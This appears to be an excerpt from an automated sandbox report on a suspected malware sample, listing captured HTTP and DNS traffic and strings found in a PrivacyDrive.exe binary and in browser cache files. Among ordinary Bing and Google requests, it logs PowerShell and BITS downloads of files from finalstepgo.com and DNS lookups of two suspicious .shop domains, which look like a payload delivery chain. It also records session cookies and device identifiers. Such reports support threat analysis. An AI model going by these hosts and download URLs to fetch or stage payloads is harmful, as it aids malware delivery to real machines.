NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic	HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1Accept: /Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitOrigin: https://www.bing.comAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/17/jnc,nj/4bnLx4S3ZRMpYV30k3R5vRy8JVg.js?bu=DygxeIQBiQGMAYEBe37EAccBMbcBMcoB&or=w HTTP/1.1Accept: /Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=cmd&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=2f3ed6de36a14f3ebfed8e293d185e72&ig=ab8cc421015045729b90f8501479ca3a HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: /Accept-Language: en-CHX-Agent-DeviceId: 01000A4109009A83X-BM-CBT: 1727366134X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStoreX-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x640X-BM-DeviceDimensionsLogical: 784x640X-BM-DeviceScale: 100X-BM-DTZ: -240X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75X-Device-ClientSession: 64942352AA494B6483DE4D15F1BB38FCX-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109009A83X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2X-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=c&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=2f3ed6de36a14f3ebfed8e293d185e72&ig=6e3b69b5871b441ca54bf33441a9e1fe HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: /Accept-Language: en-CHX-Agent-DeviceId: 01000A4109009A83X-BM-CBT: 1727366134X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStoreX-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x640X-BM-DeviceDimensionsLogical: 784x640X-BM-DeviceScale: 100X-BM-DTZ: -240X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75X-Device-ClientSession: 64942352AA494B6483DE4D15F1BB38FCX-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109009A83X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2X-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=cm&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=2f3ed6de36a14f3ebfed8e293d185e72&ig=6640447e40b340b6b06581e0487d07db HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: /Accept-Language: en-CHX-Agent-DeviceId: 01000A4109009A83X-BM-CBT: 1727366134X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStoreX-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x640X-BM-DeviceDimensionsLogical: 784x640X-BM-DeviceScale: 100X-BM-DTZ: -240X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75X-Device-ClientSession: 64942352AA494B6483DE4D15F1BB38FCX-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109009A83X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2X-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/1a/cir3,ortl,cc,nc/CYGXBN1kkA_ojDY5vKbCoG4Zy0E.css?bu=C7wJmAO6BJgK_QjnCO0GWlpaWg&or=w HTTP/1.1Accept: /Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
Source: global traffic	HTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: /Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: fp.msedge.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rb/1a/cir3,ortl,cc,nc/eNojzGTgc6FFJi_kGAzzghOMEG4.css?bu=B8ECRa8ClwFaWswC&or=w HTTP/1.1Accept: /Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
Source: global traffic	HTTP traffic detected: GET /rb/3F/ortl,cc,nc/4-xJy3tX6bM2BGl5zKioiEcQ1TU.css?bu=A4gCjAKPAg&or=w HTTP/1.1Accept: /Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
Source: global traffic	HTTP traffic detected: GET /rb/6j/cir3,ortl,cc,nc/_McBPQ_9mTftkbN3lEsLB5a8qvg.css?bu=MsIKvArICrwKrAu8CrILvAq8Cr0LvArEC7wKygu8CtALvArWC7wK2gq8CuAKvArUCrwKvAqjC7wK7wq8CvUKvArpCrwKvAqFC4gLvAq8CqALjgu8CpQLlwu8Cv8LvArcC7wKrQw&or=w HTTP/1.1Accept: /Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
Source: global traffic	HTTP traffic detected: GET /rb/6j/ortl,cc,nc/QNBBNqWD9F_Blep-UqQSqnMp-FI.css?bu=AbwK&or=w HTTP/1.1Accept: /Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?e3bfee56476065f0ab149b748f731e37 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: p-ring.msedge.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rb/6j/ortl,cc,nc/_BjeFNPDJ-N9umMValublyrbq4Y.css?bu=CZoMvAqfDLwKowy8CrwKvAq8Cg&or=w HTTP/1.1Accept: /Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?abf6b0b4363a8fb8ec7d6cce4a4b9cc3 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: p-ring.msedge.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uploads/il2.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: finalstepgo.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uploads/il222.zip HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Thu, 26 Sep 2024 14:09:59 GMTUser-Agent: Microsoft BITS/7.8Host: finalstepgo.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=SBWgPo8m6MLKgX2&MD=VCxfKomC HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: chromecache_184.1.dr, chromecache_219.1.dr	String found in binary or memory: ()=>{this.close()});bo(this.g,"ddl-share-facebook",()=>{var g=kj(hj("facebook_link",null)\|\|lj(d));if(!mj()){g=Vn(g);var h={app_id:"738026486351791",href:g,hashtag:"#GoogleDoodle"};g=new wg;for(var k in h)g.add(k,h[k]);k=new qg("https://www.facebook.com/dialog/share");tg(k,g);fg(k.toString());yl(5)}});bo(this.g,"ddl-share-twitter",()=>{var g=kj(hj("twitter_link",null)\|\|lj(d));mj()\|\|(g=Vn(g),g="text="+encodeURIComponent(b+"\n"+g),fg("http://twitter.com/intent/tweet?"+g),yl(6))});bo(this.g,"ddl-modal-copy-link-container", equals www.facebook.com (Facebook)
Source: chromecache_184.1.dr, chromecache_219.1.dr	String found in binary or memory: ()=>{this.close()});bo(this.g,"ddl-share-facebook",()=>{var g=kj(hj("facebook_link",null)\|\|lj(d));if(!mj()){g=Vn(g);var h={app_id:"738026486351791",href:g,hashtag:"#GoogleDoodle"};g=new wg;for(var k in h)g.add(k,h[k]);k=new qg("https://www.facebook.com/dialog/share");tg(k,g);fg(k.toString());yl(5)}});bo(this.g,"ddl-share-twitter",()=>{var g=kj(hj("twitter_link",null)\|\|lj(d));mj()\|\|(g=Vn(g),g="text="+encodeURIComponent(b+"\n"+g),fg("http://twitter.com/intent/tweet?"+g),yl(6))});bo(this.g,"ddl-modal-copy-link-container", equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: google.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: csp.withgoogle.com
Source: global traffic	DNS traffic detected: DNS query: ogs.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: finalstepgo.com
Source: global traffic	DNS traffic detected: DNS query: candleduseiwo.shop
Source: global traffic	DNS traffic detected: DNS query: racedsuitreow.shop

Source: unknown

HTTP traffic detected: POST /gen_204?s=webhp&t=cap&atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&rt=wsrt.2066,cbt.97,hst.35&opi=89978449&ts=300 HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"Content-Type: text/plain;charset=UTF-8sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.google.comX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO

Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://crl.thawte.com/ThawtePremiumServerCA.crl0
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://s.symcd.com06
Source: chromecache_200.1.dr	String found in binary or memory: http://schema.org/WebPage
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://t2.symcb.com0
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://tl.symcd.com0&
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: chromecache_214.1.dr, chromecache_204.1.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: chromecache_231.1.dr, chromecache_226.1.dr	String found in binary or memory: http://www.broofa.com
Source: chromecache_184.1.dr, chromecache_219.1.dr	String found in binary or memory: http://www.google.com/doodles/_SHARE?description=
Source: chromecache_200.1.dr	String found in binary or memory: http://www.google.com/doodles/celebrating-popcorn?hl=en
Source: chromecache_184.1.dr, chromecache_219.1.dr	String found in binary or memory: http://www.gphysics.com
Source: PrivacyDrive.exe, 00000010.00000003.1510267405.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000000.1435518072.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe.15.dr	String found in binary or memory: http://www.privacy-drive.comx
Source: chromecache_217.1.dr, chromecache_207.1.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_217.1.dr, chromecache_207.1.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_234.1.dr	String found in binary or memory: https://accounts.google.com/signin/v2/identifier%3Fec%3Dfutura_hpp_co_si_001_p%26continue%3Dhttps%25
Source: chromecache_231.1.dr, chromecache_217.1.dr, chromecache_207.1.dr, chromecache_226.1.dr, chromecache_200.1.dr	String found in binary or memory: https://apis.google.com
Source: chromecache_225.1.dr, chromecache_220.1.dr	String found in binary or memory: https://apis.google.com/js/api.js
Source: chromecache_238.1.dr, chromecache_221.1.dr	String found in binary or memory: https://cda-push-dev.sandbox.googleapis.com/upload/
Source: chromecache_217.1.dr, chromecache_207.1.dr	String found in binary or memory: https://clients6.google.com
Source: chromecache_221.1.dr	String found in binary or memory: https://content-push.googleapis.com/upload/
Source: chromecache_217.1.dr, chromecache_207.1.dr	String found in binary or memory: https://content.googleapis.com
Source: chromecache_242.1.dr, chromecache_217.1.dr, chromecache_207.1.dr, chromecache_193.1.dr	String found in binary or memory: https://csp.withgoogle.com/csp/lcreport/
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: chromecache_217.1.dr, chromecache_207.1.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: chromecache_238.1.dr, chromecache_221.1.dr	String found in binary or memory: https://embeddedassistant-webchannel.googleapis.com/google.assistant.embedded.v1.EmbeddedAssistant/A
Source: chromecache_227.1.dr	String found in binary or memory: https://fonts.google.com/license/googlerestricted
Source: chromecache_227.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/fredoka/v14/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OwyL8E-mKpNk.
